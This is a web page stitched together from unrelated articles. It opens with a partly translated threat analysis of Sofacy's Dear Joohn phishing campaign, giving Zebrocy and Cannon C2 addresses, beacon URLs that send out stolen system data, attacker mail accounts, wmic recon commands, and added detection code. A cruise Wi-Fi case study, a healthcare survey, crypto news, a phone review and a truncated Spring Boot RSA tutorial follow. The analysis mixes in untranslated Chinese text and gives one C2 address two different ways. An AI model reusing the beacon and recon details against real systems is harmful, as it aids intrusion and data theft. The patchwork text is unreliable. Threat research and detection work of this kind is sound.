One document shows the recipient blurred content in which a NATO Explosive Ordnance Disposal (EOD) seal is clearly visible. The document still contains only an image, blurred, whose content relates to a NATO seminar. The other two documents closely resemble each other: both display garbled text along with instructions on how to view the document correctly. Interestingly, the instructions in one of them are written in Russian, which may indicate a target in a Russian-speaking country.

Regardless of their content, all the malicious documents use the same technique. When opened, the document first uses Word's built-in functionality to try to download a remote template, which then loads the malicious macro, as shown in Figure 4.


Figure 4. Microsoft Word attempting to download a remote template

If the C2 server is up when the document is opened, the download succeeds and the malicious macro is loaded into the same Word session; the recipient then sees an "Enable Content" prompt, as shown in Figure 5. If the C2 server is down, the download fails and the recipient never sees the prompt, because no macro was downloaded.


Figure 5. Downloaded remote template prompting the recipient to click "Enable Content" to run the macro
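The remote-template hook Word follows here lives in a predictable place inside the .docx package: a relationship of type attachedTemplate in word/_rels/settings.xml.rels whose TargetMode is External. That makes the technique, and the author metadata the campaign was pivoted on, cheap to triage without opening the file in Word. The following is an added example written for this page, not Unit 42's tooling: it reads those two parts of a .docx with the Python standard library, flags an external template with an http(s) target, and also builds a minimal constructed .docx (not a real Dear Joohn sample; the template URL uses a documentation address) so that it runs offline.

```python
"""Triage a .docx for a remote (external) attached template and pull the author metadata."""
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

PKG_REL = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
CORE_NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}


def remote_templates(docx: bytes) -> List[str]:
    """External attachedTemplate targets from word/_rels/settings.xml.rels (the hook Word follows on open)."""
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        if "word/_rels/settings.xml.rels" not in z.namelist():
            return []
        root = ET.fromstring(z.read("word/_rels/settings.xml.rels"))
    targets = []
    for rel in root.iter("{%s}Relationship" % PKG_REL):
        if rel.get("Type") == ATTACHED_TEMPLATE and rel.get("TargetMode") == "External":
            targets.append(rel.get("Target", ""))
    return targets


def core_metadata(docx: bytes) -> Dict[str, Optional[str]]:
    """Author / last-saved-by / created / modified from docProps/core.xml, the fields the campaign was linked on."""
    fields = {"creator": "dc:creator", "last_modified_by": "cp:lastModifiedBy",
              "created": "dcterms:created", "modified": "dcterms:modified"}
    out: Dict[str, Optional[str]] = {k: None for k in fields}
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        if "docProps/core.xml" not in z.namelist():
            return out
        root = ET.fromstring(z.read("docProps/core.xml"))
    for key, path in fields.items():
        el = root.find(path, CORE_NS)
        out[key] = el.text if el is not None else None
    return out


def triage(docx: bytes) -> Dict[str, object]:
    """Combine both checks; a template fetched over http(s) is the remote-template injection pattern."""
    templates = remote_templates(docx)
    verdict: Dict[str, object] = dict(core_metadata(docx))
    verdict["remote_templates"] = templates
    verdict["suspicious"] = any(t.lower().startswith(("http://", "https://")) for t in templates)
    return verdict


def build_sample_docx(template_target: Optional[str], creator: str, last_modified_by: str) -> bytes:
    """Constructed minimal .docx containing only the parts the triage reads; not a real sample."""
    rels = ['<?xml version="1.0" encoding="UTF-8" standalone="yes"?>',
            '<Relationships xmlns="%s">' % PKG_REL]
    if template_target is not None:
        rels.append('<Relationship Id="rId1" Type="%s" Target="%s" TargetMode="External"/>'
                    % (ATTACHED_TEMPLATE, template_target))
    rels.append("</Relationships>")
    settings = ('<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
                '<w:attachedTemplate r:id="rId1"/></w:settings>')
    # Timestamps mirror the ones the post reports for the first four documents.
    core = ('<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s" xmlns:dcterms="%s" '
            'xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
            '<dc:creator>%s</dc:creator><cp:lastModifiedBy>%s</cp:lastModifiedBy>'
            '<dcterms:created xsi:type="dcterms:W3CDTF">2018-09-11T04:22:00Z</dcterms:created>'
            '<dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-13T08:21:00Z</dcterms:modified>'
            '</cp:coreProperties>') % (CORE_NS["cp"], CORE_NS["dc"], CORE_NS["dcterms"], creator, last_modified_by)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/settings.xml", settings)
        z.writestr("word/_rels/settings.xml.rels", "\n".join(rels))
        z.writestr("docProps/core.xml", core)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("http://203.0.113.10/nato-seminar.dotm", "Joohn", "Joohn")
    print(triage(sample))
```

A legitimate document whose template points at a local Normal.dotm shows up as an external relationship too, which is why the verdict keys on the URL scheme rather than on the mere presence of the relationship; mail-gateway rules that strip or quarantine on an http(s) attachedTemplate catch this whole campaign regardless of which decoy image or filename was used.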

Malicious document analysis

The malicious documents Unit 42 captured in October and November share many similarities (Table 1), which allowed Unit 42 to link the attacks. The most obvious is the author name, Joohn. November brought a slight deviation: the three samples captured that month still used Joohn, but only as the "last saved by" value, while the "author" property changed to the default "USER/user".


Table 1. Malicious documents seen in the Dear Joohn campaign

The remote templates downloaded by the documents in Table 1 also share an author name, xxx, as shown in Table 2 (full hashes and metadata are available here).


Table 2. Remote templates downloaded by the Dear Joohn documents

As Table 1 shows, the documents download their remote templates from four different C2 servers at the following IP addresses:

185.203.118[.]198
145.249.105[.]16
188.241.58[.]170
109.248.148[.]42

These initial C2 IP addresses host not only the remote templates that load the first-stage Zebrocy or Cannon payload but also the C2 for the first-stage payload itself. All C2 in the Dear Joohn campaign is IP-based, and the infrastructure has no overlap or connection with earlier Zebrocy or Sofacy infrastructure. Figure 6 shows the Dear Joohn infrastructure.


Figure 6. Dear Joohn campaign infrastructure

From the timestamps in Table 3, Unit 42 built a campaign timeline and found that the attacks cluster in mid-to-late October and mid-November, as shown in Figure 7.


Table 3. Malicious document timestamps (all times UTC)


Figure 7. Dear Joohn campaign timeline

The timestamps show that the first four documents were created at the same moment, 04:22 on 11 September 2018, and modified at the same moment, 08:21 on 13 October 2018. Four documents created and modified at exactly the same times yet embedding three different C2 addresses suggests the attackers used an automated tool; command-line phishing toolkits such as Phishery can generate multiple documents with different inputs from a simple script. On average, 46 days elapsed between the creation of these four documents and their use in attacks. The campaign's tempo clearly increased over time, with the average gap between document creation and use falling to about two days.

Payload analysis

As described above, the Dear Joohn documents download a remote template whose macro installs the first-stage payload. Apart from Cannon, the first-stage payloads are almost all Zebrocy variants, written in several languages including Delphi, C# and VB.NET. Table 4 lists all first-stage payloads seen in the campaign.


Table 4. First-stage payloads seen in the Dear Joohn campaign

Notably, the Zebrocy Delphi variant in this campaign closely resembles the Delphi downloader discussed in Unit 42's June 2018 Zebrocy analysis, so it should be considered a known variant. The C# and VB.NET variants, however, have not been reported before. All Zebrocy Delphi variants in this campaign are UPX-packed, while none of the other variants are packed. Unit 42 suspects this is precisely because the Delphi variant is already well known and widely analysed, and Sofacy packed it to improve its chances of evading detection.

From the Cannon samples it collected and analysed, Unit 42 concluded that the Delphi-written Cannon is also a new variant. Given that Sofacy already builds Zebrocy in multiple languages, it is equally capable of building Cannon variants in several programming languages.

C# Cannon

Since publishing its Cannon analysis, Unit 42 has captured additional Cannon samples to better understand its origins. The first known C# Cannon sample appears to have been created on 18 April 2018, and at least seven samples have been released since. Table 5 shows all known C# Cannon samples, their compile times and the e-mail accounts used for C2.


Table 5. Known C# Cannon samples

As Unit 42 noted in its original analysis, the e-mail address used as C2 was sahro.bella7[at]post.cz, but all earlier C# Cannon samples used sym777.g[at]post.cz. All earlier C# Cannon samples also used the same account name, kae.mezhnosh, to receive e-mail from the attackers, and the account names vebek.morozh30, g0r7tsa45s and marvel.polezha to send e-mail to the attackers.

Also as noted in the original analysis, C# Cannon can log in to an e-mail account over POP3S and look for e-mails carrying an attachment with a specific filename, which it saves to the target system and executes. The sample Unit 42 originally analysed looked for an attachment named auddevc.txt, but other C# Cannon samples look for the following filenames:

wmssl.txt
audev.txt

Delphi Cannon

While collecting Cannon samples, Unit 42 found another Cannon variant that uses e-mail for C2. It was linked to Cannon because it uses the filename "wmssl.exe", which is converted from the wmssl.txt attachment and used to install and execute a secondary payload. That alone would not tie it conclusively to Cannon, but after collecting more Delphi Cannon samples Unit 42 found further evidence of a relationship. Table 6 shows all the Delphi Cannon samples Unit 42 collected; the sample with SHA256 215f7c08c2 .. closely resembles the Trojan discussed in ESET's analysis.


Table 6. All Delphi Cannon samples collected by Unit 42

Table 6 shows that the Delphi Cannon variants were compiled earlier than the variant discussed in Unit 42's original report: the first known Delphi sample was compiled in January 2018, whereas the Cannon sample in the original report was compiled in April 2018. Rather than a legitimate web-mail service, the Delphi Cannon variant uses mailboxes on the actor-controlled domain ambcomission[.]com, which ThreatConnect has linked to a larger Sofacy infrastructure network. Although Delphi Cannon also uses POP3S and SMTPS for C2, because it relies on an attacker-controlled domain its e-mail is easier for recipients to block than mail from a legitimate provider such as Seznam.

已知最早的Delphi变种样本(SHA256:5a02d4e5f6 ...)为Unit 42提供了更多能够证明Delphi Cannon和Cannon之间存在联系的证据。例如,这个样本会将收集到的系统信息发送给C2,其中涉及到将正在运行进程的路径附加到header字符串Running place,而这个字符串也可以在C# Cannon样本(SHA256:4405cfbf28 ...)的inf函数中找到,如图8所示:


APT最前线:Sofacy持续发送钓鱼邮件传播木马变种

图8. C# Cannon的inf函数

Comparing the two Cannon classes, Unit 42 also found a function in the Delphi Cannon sample (SHA256: 5a02d4e5f6...) that uses Running place and Logical_Drivers as header strings when emailing collected system information to the C2. Although not an exact match, C# Cannon contains similar header strings, as shown in Figure 9, which gave Unit 42 further confidence that the two classes belong to the same Trojan family:

Figure 9. Similarities between Delphi Cannon and C# Cannon (image not reproduced)

VB.NET Zebrocy

The VB.NET Zebrocy variant (SHA256: e5aece694d..) closely resembles other known Zebrocy variants: it embeds the hard-drive volume serial number in the URL it uses as a C2 beacon. It obtains the serial number by creating a Scripting.FileSystemObject, calling GetDriveName on the path stored in Environment.SpecialFolder.LocalApplicationData, and then calling GetDrive with that drive name to read the drive's SerialNumber. The variant then collects system information and the list of running processes by running the following command:

systeminfo & tasklist

The URL used to send the system information, running processes and a screenshot to the C2 server is:

hxxp://109.248.148[.]42/agr-enum/progress-inform/cube.php?res=[serial number]

The VB.NET Zebrocy variant transmits the collected data in an HTTP POST request to this URL, with a body structured as follows (note the space on each side of the "&"):

data=[system information and running processes] & arg=[screenshot in BMP format]

C# Zebrocy

The C# Zebrocy variant is functionally similar to the other variants, but has some features of its own worth discussing. Like the others, it collects the volume serial number for its outbound beacon to the C2 server, in this case by calling the Windows API function GetVolumeInformation on the C: drive. It can also capture screenshots, which it transmits to the C2 server as JPEG files.

Apart from the programming language, the most notable change in the C# variant is how it gathers system information and running processes: it uses WMI queries instead of the systeminfo and tasklist commands. The queries are:

wmic logicaldisk get Caption, Description,VolumeSerialNumber,Size,FreeSpace
wmic diskdrive get Model, SerialNumber
wmic computersystem get Manufacturer, Model, Name, SystemTypec
wmic os get Caption, OSArchitecture, OSLanguage,SystemDrive,MUILanguages
wmic process get Caption,ExecutablePath

The URL used to send the system information, running processes and a screenshot to the C2 server is:

hxxp://145.249.105[.]165/resource-store/stockroom-center-service/check.php?fm=[serial number]

The C# Zebrocy variant transmits the collected data in an HTTP POST request to this URL, with a body structured as follows:

spp=[system information from WMI queries] &spvg=[screenshot in JPEG format]

Summary
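Two detection hooks built from the indicators above, written as an added example for this page rather than code from the Unit 42 report. The first parses constructed HTTP proxy records and classifies POSTs that match the VB.NET beacon (cube.php?res=, body fields data and arg joined by " & ") or the C# beacon (check.php?fm=, body fields spp and spvg). The second takes a batch of process command lines and flags the burst of wmic queries the C# variant runs. The record format, the sample records and their serial numbers are constructed; the paths, query parameters, body field names and wmic aliases are the ones reported above.

```python
"""Detection helpers for the Zebrocy beacons and wmic recon described above.

Added example for this page (not Unit 42's code). Indicators come from the
report; the log record format and the sample records are constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Beacon shapes from the report: URI path, query parameter carrying the volume
# serial number, and the POST body field names in order.
ZEBROCY_BEACONS = {
    "vbnet": {"path": "/agr-enum/progress-inform/cube.php",
              "param": "res", "fields": ("data", "arg")},
    "csharp": {"path": "/resource-store/stockroom-center-service/check.php",
               "param": "fm", "fields": ("spp", "spvg")},
}
# Both variants join body fields with '&'; the VB.NET one pads it with spaces.
BODY_SPLIT = re.compile(r"\s*&\s*")


def body_fields(body):
    """Return the ordered field names of a 'name=value & name=value' body."""
    names = []
    for part in BODY_SPLIT.split(body):
        name, sep, _ = part.partition("=")
        if sep:
            names.append(name.strip())
    return tuple(names)


def classify_beacon(method, url, body):
    """Return the Zebrocy variant whose beacon this request matches, else None."""
    if method.upper() != "POST":
        return None
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)
    for variant, sig in ZEBROCY_BEACONS.items():
        if (parts.path == sig["path"] and sig["param"] in query
                and body_fields(body) == sig["fields"]):
            return variant
    return None


def scan_log(records):
    """Scan '<method> <url> <body>' records; return (variant, c2 host, serial) per hit."""
    hits = []
    for rec in records:
        try:
            method, url, body = rec.split(" ", 2)
        except ValueError:
            continue  # malformed record, skip it
        variant = classify_beacon(method, url, body)
        if variant:
            parts = urlsplit(url)
            serial = parse_qs(parts.query)[ZEBROCY_BEACONS[variant]["param"]][0]
            hits.append((variant, parts.hostname, serial))
    return hits


# WMI aliases the C# variant queries through wmic, per the report.
ZEBROCY_WMIC_ALIASES = {"logicaldisk", "diskdrive", "computersystem", "os", "process"}
WMIC_RE = re.compile(r"^\s*wmic(?:\.exe)?\s+(\w+)\s+get\b", re.IGNORECASE)


def wmic_recon_aliases(cmdlines):
    """Return the set of report-listed wmic aliases seen in a batch of command lines."""
    seen = set()
    for cmd in cmdlines:
        m = WMIC_RE.match(cmd)
        if m and m.group(1).lower() in ZEBROCY_WMIC_ALIASES:
            seen.add(m.group(1).lower())
    return seen


def looks_like_zebrocy_recon(cmdlines, threshold=4):
    """True if one process tree ran at least `threshold` of the five wmic queries."""
    return len(wmic_recon_aliases(cmdlines)) >= threshold


# Constructed sample records; the C2 addresses are the report's, serials invented.
SAMPLE_LOG = [
    "POST http://109.248.148.42/agr-enum/progress-inform/cube.php?res=A1B2C3D4 "
    "data=Host Name: WS01 & arg=Qk02AAAAAAAAADYAAAAoAAAA",
    "POST http://145.249.105.165/resource-store/stockroom-center-service/check.php?fm=DEADBEEF "
    "spp=Caption  Description  VolumeSerialNumber &spvg=/9j/4AAQSkZJRg",
    "GET http://intranet.example/index.html -",
    "POST http://intranet.example/cube.php?res=A1B2C3D4 data=x & arg=y",  # wrong path
]
# Constructed command lines, copied from the wmic list above.
SAMPLE_CMDLINES = [
    "wmic logicaldisk get Caption, Description,VolumeSerialNumber,Size,FreeSpace",
    "wmic diskdrive get Model, SerialNumber",
    "wmic computersystem get Manufacturer, Model, Name, SystemTypec",
    "wmic os get Caption, OSArchitecture, OSLanguage,SystemDrive,MUILanguages",
    "wmic process get Caption,ExecutablePath",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("Zebrocy %s beacon to %s, volume serial %s" % hit)
    print("wmic recon burst:", looks_like_zebrocy_recon(SAMPLE_CMDLINES))
```

The beacon check keys on path, parameter and body layout together rather than on the two IP addresses, since infrastructure rotates faster than tooling; the wmic check is a threshold over one process tree because any one of those queries is ordinary administration on its own.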

The Sofacy group continues to attack organizations around the world with similar tactics and techniques. Unit 42 observed it carrying out attacks via spear-phishing emails from late October through November, often using recent news events as filenames to lure recipients into opening malicious attachments. In these attacks the group showed a clear preference for simple downloaders such as Zebrocy as the first-stage payload. At the same time, the group is clearly still developing Zebrocy, having produced VB.NET and C# versions, and it appears to have used different versions of Cannon in past campaigns.

Statement: this article is from 黑客视界; copyright remains with the author. The content represents the author's independent views and not the position of 安全内参; it is reproduced to share more information. For reprints, please contact the original author for authorization.

Connecting Passengers to their Perfect Cruise Experience


Marella Cruises, operated by TUI UK&I, offers everything from all-inclusive trips to intimate adventures, and has a proud history of transporting passengers to over 200 destinations around the globe. With a company mission to help passengers discover their smile, Marella Cruises has many years of experience in the art of delivering great cruise-ship experiences, with a home-away-from-home atmosphere across its fleet of six ships.

Making the most of life on board

Much of this experience comes from a clear emphasis on customer service to make each trip as luxurious as possible. But in the modern world, there’s no escaping the need for digital connection, even in the middle of the Atlantic. To keep things running smoothly, network access has become an important part of life onboard cruise ships. With this in mind, Marella felt the time was right to ensure it had the right infrastructure in place to support its increasing need for connectivity.

Building the infrastructure for internet access has understandably always been a challenge for cruise ships, especially once the need for network security and the power to govern passenger usage is factored in. Historically, connectivity and intranet services onboard cruise ships have been patchy at best, due to the limitations of delivering this service while at sea. Marella therefore needed a robust network which could support heavy usage across its ships.

Marella also knew it could significantly enhance the customer experience by offering more digital engagement. With most people now using apps and websites to find information and book services in their everyday lives, developing an onboard app was a natural next step for improving Marella’s communications.

As such, Marella planned to launch a digital companion application, Navigate. This would help passengers maximise their onboard experience, enabling them to access information about ship schedules and entertainment, in addition to making bookings like spa treatments, excursions, and tables in Marella’s a la carte restaurants.

However, Marella also wanted to offer this with no app download, over a ship-wide ‘intranet’ rather than via customer Wi-Fi. This would encourage widespread adoption of the platform, minimising the hassle and cost for passengers. All of this needed to be achieved in a secure manner, giving Marella’s staff access to the network’s security features.

Creating connectivity at sea

Although Marella had a clear vision for the platform it wanted to deliver, this couldn’t be done without a robust infrastructure in place. In light of this, Fortinet and channel partner Tes Media needed to provide a flexible solution which would offer highly available coverage, even in difficult to cover areas of the ships.

To meet this demand, Fortinet and Tes Media worked closely with Marella to plan and execute a new connectivity strategy. This was deployed smoothly in a four-week window, using over 600 Fortinet AP Access Points , a number of FWC 500D Wireless Controllers, a Wireless Manager, and two FortiGate Firewalls . To date, Fortinet has provided three ships in Marella’s fleet with onboard internet and Firewall solutions, with another ship planned.

This has given Marella’s ships a fault-free, high density infrastructure, in addition to supporting the delivery of the new Navigate app. This has led to widespread adoption of this platform, as passengers are able to access the content and services within the app without needing to sign up for customer Wi-Fi.

Along with Tes Media, Fortinet has allowed TUI to make the most of its existing infrastructure and helped it to plan for its digital communication strategies moving forward. It has also given IT staff the platforms and tools they need to access and govern their systems, whether that’s viewing security threat data or controlling internet usage. Fortinet has enabled this ability and more, all on an easy-to-manage interface.

Reflecting on the deployment, Rowan Stallard, Electro-Technical Manager, TUI UK&I Marella Cruises said “Network access has become an important part of life onboard cruise ships. Fortinet has allowed TUI to make the most of its existing infrastructure and helped it to plan for its digital communication strategies moving forward.”

Find out more about how the Fortinet Security Fabric provides protection at the edge.


Healthcare Cybersecurity in Intensive Care


Despite regulatory mandates and years of costly data breaches in the healthcare industry, a recent survey found that less than one-third of healthcare organizations say they have a comprehensive cybersecurity program in place.

The 2018 CHIME HealthCare’s Most Wired survey found that only 29 percent of healthcare organizations have such a program in place. To make matters worse, 31 percent of those organizations that don’t have a program in place never meet with their executive committee or meet less than once a year.

For the survey, CHIME questioned 618 healthcare organizations.

The survey also found that healthcare organizations are getting away from building their own security programs from scratch and moving toward NIST and HITRUST frameworks. In addition to having a framework in place, CHIME determined that a comprehensive security program also includes having a dedicated senior security leader, an adequate security budget, governance and oversight committees, and regular meetings to determine and mitigate program gaps.

“Having a dedicated chief information security officer (CISO) and regularly reporting security updates to an executive committee are some of the first steps to mitigating cybersecurity vulnerabilities,” the report stated. “However, for most organizations, establishing these security foundations is still a work in progress. Only 29 percent of organizations report having a comprehensive security program in place.”

“Healthcare organizations with a comprehensive security program are more likely to support critical security measures, such as data-loss prevention (12 percent higher adoption), bring-your-own-device management (13 percent higher adoption), database monitoring (13 percent higher adoption), provisioning systems (14 percent higher adoption), log management (16 percent higher adoption), and adaptive risk-based authentication for network access (16 percent higher adoption),” the report found.

The study also found that, while organizations are doing many of the basics, such as using passwords and firewalls and having good device disposal policies in place, healthcare organizations often lack other recommended practices such as mobile device management, unique user identification and physical device locks, and often do not encrypt removable storage devices or backups.

There was some good news. Most of the organizations surveyed do participate, many informally, in sharing cybersecurity information within a healthcare or cybersecurity group such as the Cyber Information Sharing and Collaboration Program, the National Cybersecurity and Communication Integration Center, or the Health Cybersecurity and Communication Integration Center.

Finally, while the majority of survey respondents believe they could recover their IT operations in the event of a disaster, the survey revealed there is much work to be done for many organizations. Sixty-eight percent believe they could recover their clinical, financial, supply chain management, and human resources and staffing systems within 24 hours of the complete loss of their primary data center, and almost all organizations have a data repository for backup, with off-site backups used most frequently.

It’s good to see some cybersecurity progress in healthcare. As we’ve covered in When It Comes to Data Breaches, Healthcare Businesses Stand to Lose Most, for eight consecutive years healthcare organizations incurred the highest costs from data breaches, at an average of $408 per lost or stolen record. Costs associated with data breaches in healthcare are nearly three times higher than in other industries.

In Healthcare data breaches on the rise we covered how an analysis of healthcare data breaches for the first half of 2017 showed the healthcare industry on a path to suffer more than one data breach a day.

Highlights from that Breach Barometer Report: Mid-Year Review, from patient privacy monitoring provider Protenus and data breach tracking website databreaches.org, showed that through June of last year there were 233 breaches reported to U.S. Health and Human Services (HHS), to state attorneys general, or in the media. For 193 of those incidents, a total of 3,159,236 patient records were exposed.

Hopefully, in the months and years ahead, healthcare will continue, if not increase, the investments necessary to reduce the number of breaches in that industry and make those breaches that do occur much less costly and impactful.

TokenSoft Expands Its Services Acquiring SEC-Registered Broker-Dealer

CoinSpeaker

TokenSoft, a security token platform that focuses on the tokenization of traditional assets, has announced an investment in a broker-dealer registered with the Securities and Exchange Commission (SEC), now renamed TokenSoft Global Markets, LLC. According to the press release, TokenSoft is now entitled to acquire 100% of TokenSoft Global Markets, subject to regulatory approval.

As a result of the deal, TokenSoft will let issuers choose whether to host a token sale themselves or work with a broker-dealer to manage the sale on their behalf. For its part, TokenSoft Global Markets will expand its range of services to custody solutions, referrals to exchanges and private placements, among others.

As the announcement states,those who choose to tap the expertise of a broker-dealer will be able to turn to TokenSoft Global Markets for guidance and hands-on support at every step of the sale process.

Mason Borda, CEO of TokenSoft, commented:

“As a result of rapidly growing interest in the security token market, we have been inundated with requests for broker-dealer support services. With this investment, we are building a one-stop-shop for digital asset issuance and management ― enabling us to expand our security and compliance support to every stage of a digital asset’s lifecycle.”

Lawson Baker, Head of Project Zero at TokenSoft, said:

“The new services offered by TokenSoft Global Markets will be fully integrated into our high touch customer experience. We are committed to providing our clients with everything they need to participate in the future of security tokens, and TokenSoft Global Markets is a reflection of that commitment.”

TokenSoft Partners with Coinbase to Offer Alternative Solutions

TokenSoft provides a range of technology and security products for the sale, issuance and management of digital assets. The company offers a new fundraising solution that could soon overtake initial coin offerings (ICOs). Recently, the company took part in a $3 million funding round for crypto data startup Nomics.

Before the acquisition announcement, TokenSoft partnered with Coinbase to provide an alternative custody solution for clients. STO issuers can now choose between self-custody and third-party custody, the latter provided through Coinbase Custody.

Announcing integration between TokenSoft Global Markets and Coinbase Custody to provide security token issuers access to institutional-grade security, and an intuitive and easy-to-use interface for storing and receiving funds. Read more: https://t.co/0FbGpPOM6l

― TokenSoft Inc. (@TokenSoftInc) December 20, 2018

For those who prefer Coinbase, the exchange will handle custody, insurance and auditable control of their digital assets, while TokenSoft will handle compliance, regulation, distribution and exchange relationships. Coinbase Custody will be made available through TokenSoft Global Markets, TokenSoft’s new regulated broker-dealer affiliate registered with the Financial Industry Regulatory Authority (FINRA).

Coinbase Custody, launched in May of this year,provides a crypto asset storage service for high net-worth investors or institutions with over $10 million in deposits. Earlier, Coinbase Custody operated only in New York State, but now it is expanding its coverage to such European jurisdictions as Andorra, Gibraltar, Guernsey, Iceland, the Isle of Man and Lithuania, which means thatcustomers in these locations will be able to gain a full access to the Coinbase retail service, using the website and mobile apps for trading.


Secure and long-lasting, a KingKong wherever you travel: a hands-on review of the Hisense KingKong 4

Setting off with the Hisense KingKong 4

The day before my MT European trip I received this Hisense KingKong 4, so I brought it along on my European road trip. Let's go!


Before it arrived I did some homework on the KingKong 4's background. Its selling points are battery life and security. The body follows a minimalist German-style design, with a champagne-gold frame that adds a touch of elegance.


The back uses a Bohemian texture pattern, built from repeated motifs that give it a romantic, mysterious, rhythmic look and a real sense of quality. The solid body also feels good in the hand. The rear 13-megapixel camera sits above the LED flash in a single module, which makes the phone instantly recognizable.


The front carries a 6.22-inch notched full screen with an 88.82% screen-to-body ratio; almost the entire front is display, which is rare in a phone at this price (around 1,000 yuan). The side and top bezels are fairly narrow, the chin slightly wider. At 1520x720 no pixels are visible at normal viewing distance, and the screen looks very good in practice.


Inside, the KingKong 4 runs a Snapdragon 439 with eight A53 cores clocked up to 1.95GHz, an integrated Adreno 505 GPU and a 150Mbps downlink. The base model has 4GB of RAM and 64GB of storage, enough for everyday entertainment.


It ships with VISION 6, based on Android 8.1, keeping pace with major Android releases. The UI is dignified and muted, easy on the eyes. VISION adds a number of AI features: a red-packet assistant, floating navigation, a quick assistant and so on.


A European trip with the "KingKong"

Over 12 days in Europe I visited the Czech Republic, Austria and Hungary and passed through many beautiful villages, taking snapshots with the KingKong 4 along the way to share here.


(The Bone Church in the Czech Republic, which holds the bones of 40,000 to 70,000 people who died of medieval disease and war; shot with the Hisense KingKong 4)

It also played an important role on the trip: mobile Wi-Fi hotspot.

Because battery life and security are the KingKong 4's selling points, it comes with a 4500mAh battery to underline its endurance, which is uncommon in its class and a clear differentiator.

Officially the KingKong 4 manages 56.3 hours of continuous talk time or 15.3 hours of continuous video, and it supports reverse charging, so besides being a phone it can serve as a power bank. Hearing is one thing and testing another, so let me see how it performs in real use.

After landing in Prague we put a local SIM in the KingKong 4 and used it to share a mobile hotspot. With mobile data and the hotspot on all day and two to three phones connected, it still had about 30% battery by evening, better than any mobile Wi-Fi device I know of, and better on battery than the Huawei Honor V10 I use. Signal range and quality were also satisfying.

(Below are sample photos from the European trip taken with the Hisense KingKong 4)


Back home I tested online video playback on the KingKong 4. Why not in Europe? Because I was having too much fun, lingering over the scenery and the food.


I opened my favourite British drama and ran a five-hour test, with two rounds of PUBG in between; it finished with 53% battery. Video and games both drain a battery, so the KingKong 4's endurance is clearly very strong and should cover most scenarios.


A secure and smart little secretary: face unlock

On privacy and security, the KingKong 4's face unlock is very fast, and the screen can add fill light intelligently; in practice face unlock is quick and pleasant. Note, however, that the KingKong 4 cannot use face recognition for payments, which require the more secure numeric passcode.


Below is a brief introduction to several distinctive smart system features of the KingKong 4, to give a further feel for the system experience.

Voice transcription

This feature converts speech to text in real time and saves it as a memo. In my testing the speech recognition was somewhat faster than on typical 2,000-yuan phones. After a morning of playing with it I was pleasantly surprised by the recognition speed; accurate speech recognition frees up my hands and has become an essential little assistant when I'm out.


Private space

Users can place private contacts, messages, pictures, files and apps in a private space that is invisible to others, giving your little secrets a home. In addition, after taking a screenshot in a WeChat chat, tapping "privacy mosaic" blurs the avatars and nicknames in the conversation with one tap, saving a second editing step. A thoughtful detail that saves users time and effort.


Summary

Overall, with its elegant industrial design, excellent camera, secure user experience and large battery with strong endurance, the Hisense KingKong 4 is very competitive at around 1,000 yuan; these user-focused design choices hit real pain points, and it offers good value for money. Finally, let's enjoy some of the landscapes shot with the KingKong 4 on the trip.


This article was written by 极果 video reviewer 我是MT.

Spring Boot: RSA-encrypting sensitive values in the config server

Introduction

RSA asymmetric encryption is widely used. TLS, the encryption behind HTTPS, uses asymmetric cryptography such as RSA to authenticate the server and establish session keys, while the request traffic itself is encrypted with a symmetric cipher. RSA uses a private key and a public key, one to encrypt and the other to decrypt, hence "asymmetric". The two keys are complementary: data encrypted with the public key can only be decrypted with the private key (encryption), and data signed with the private key can be verified with the public key (signatures). In the usual one-way model the client holds only the server's public key; it encrypts data for the server, and only the party holding the private key can decrypt it. For example, a web server has a key pair, and the browser obtains the server's public key as part of the server's certificate. The client verifies that the server is genuine by validating that certificate chain against the trust anchors it holds locally, rather than by comparing raw public keys.

In our config server, values with higher confidentiality requirements can be encrypted and decrypted with RSA.

Generating a test keystore

We use the JDK's keytool to generate a keystore holding the private key, with the following command:

keytool -genkeypair -alias config-server-key -keyalg RSA -dname "CN=Config Server,OU=Xuqian,O=My Own Company,L=Beijing,S=Beijing,C=CN" -keypass changeit -keystore server.jks -storepass changeit

-genkeypair: generate a public/private key pair
-alias: the alias of the key, distinguishing keys within the same keystore
-keyalg: the key algorithm, RSA here
-dname: the distinguished name that identifies the key: CN common name, OU organizational unit, O organization, L city, S state/province, C country (all freely chosen here)
-keypass: password protecting the key
-keystore: keystore filename
-storepass: password for accessing the keystore

The command stores the generated private key in the keystore named server.jks, together with a self-signed certificate carrying the matching public key (-genkeypair always produces a pair). Spring Cloud Config Server reads the key information we provide and loads the RSA key pair from that entry when it starts; see the source of org.springframework.security.rsa.crypto.KeyStoreKeyFactory (the listing is not reproduced here).

That class uses the Java Security API (java.security.KeyStore) to load the key. The key details are then supplied to the config server through its bootstrap.yml:

encrypt:
  #key: Thisismysecretkey
  key-store:
    location: file://${user.home}/development/keys/server.jks
    password: changeit
    alias: config-server-key
    secret: changeit

Because the server cannot use symmetric and asymmetric encryption at the same time, we comment out encrypt.key and specify the asymmetric parameters:

location: path to the keystore file
password: keystore password
alias: key alias
secret: key password

Testing

We encrypt a test value with the encrypt endpoint:

curl http://localhost:8888/encrypt -d lind123

This returns the encrypted string:

